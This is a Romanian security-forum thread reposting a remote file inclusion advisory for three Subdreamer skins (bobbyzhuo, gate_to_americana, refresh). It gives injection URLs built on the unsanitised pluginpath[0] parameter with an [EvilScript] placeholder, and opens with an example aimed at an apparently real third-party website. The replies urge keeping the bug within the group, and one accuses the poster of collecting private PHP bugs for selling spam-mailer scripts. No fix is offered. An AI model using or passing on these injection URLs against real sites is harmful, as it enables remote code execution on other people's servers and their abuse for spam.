Jump to content
kw3rln

[RST] 3 subdreamer skins - RFI

Recommended Posts

exemplu: http://www.luchino.com.br/skins/bobbyzhuo/bobby1.php?pluginpath[0]=teeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee

---------------------------------------------------------------------------

Subdreamer templates - Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By fluffy_bunny [ Romanian Security Team ] : hTTp://RSTZONE.NET :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Subdreamer Skins:

1.bobbyzhuo

2.gate_to_americana

3.refresh

------------------------------------------------------------------

Exploit:

~~~~~~~

Variable $pluginpath[0] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/skins/bobbyzhuo/bobby1.php?pluginpath[0]=[EvilScript]

# http://www.site.com/[path]/skins/gate_to_americana/gta1.php?pluginpath[0]=[EvilScript]

# http://www.site.com/[path]/skins/refresh/design1.php?pluginpath[0]=[EvilScript]

---------------------------------------------------------------------------

*/

Contact:

~~~~~~~

Nick: fluffy_bunny

Homepage: hTTp://RSTZONE.NET [ in construction ]

/*

-------------------------------- [ EOF] ----------------------------------

Link to comment
Share on other sites

Guest flama
Vezi poate mai gasesti din greseala si alte vuln-uri :P
Bravo! Si ... let keep it inside ... in comunitatea RST

scarto daca imi dai voie sa citesc printre randuri shi sa traduc ce ai zis :

SUNT SPAMER/ fac sendere php shi le vand shi vreau buguri php cat mai multe shi cat mai private ca sa nu se duca repede.

right ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...